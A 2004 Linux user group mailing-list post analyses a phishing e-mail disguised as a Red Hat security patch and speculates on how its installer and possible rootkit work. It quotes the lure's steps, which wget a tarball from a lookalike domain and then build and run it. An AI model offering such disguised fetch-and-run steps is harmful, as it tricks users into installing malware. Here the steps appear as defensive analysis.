[NTLUG:Discuss] Re: First Linux patch spoof (or someone in NT screwing with me personally ;-)? -- interesting malware

Bryan J. Smith b.j.smith at ieee.org
Sun Oct 24 17:34:19 CDT 2004 

On Sun, 2004-10-24 at 18:10, Bryan J. Smith wrote:
> E-mail originated from the U of Texas at Arlington (hmmm, close by
> to you'all ... this sounds like it might have been a personal e-mail).

I also realized that Dallas is a big Microsoft center (among other
companies).
Maybe someone on NTLUG who works for them (or another) is testing select
Linux people?

Quoted from MALWARE e-mail:  
>       * First download the patch from the Security RedHat mirror: wget
>         www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
>       * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
>       * cd fileutils-1.0.6.patch
>       * make
>       * ./inst

Interesting Malware.

Convoluted POS, but I guess the "make" is what a person green to
installing Linux software might just do if they didn't know what it
actually does.

The make builds a C code installer (looks like a lot of fluff/useless
hex bytes at the top to keep me from reading the rest of the file ;-)
that then installs a RPM v3 file (contained in the .tar.gz).  I assume
it does some sort of dancing where it puts the package/version info into
the RPM database, but maybe modifies it (or uses a rootkit) so a verify
or other checks will work as expected (possibly against the real Red
Hat/Fedora package version?).  I'd find out exactly in a VM, but I've
got more important things to do right now.

More interesting is that they want you to run "./inst".  If they were
interested in better "social engineering," I would have created an
"install" target in the Makefile that did this.  Again, a person green
in installing Linux software would probably be looking for "make
install" instead.

Oh well, fun stuff on a Sunday to distract me from the fact that my
Fantasy Football team just tanked.  ;-ppp



-- 
Bryan J. Smith                                  b.j.smith at ieee.org 
------------------------------------------------------------------ 
"Communities don't have rights. Only individuals in the community
 have rights. ... That idea of community rights is firmly rooted
 in the 'Communist Manifesto.'" -- Michael Badnarik

More information about the Discuss mailing list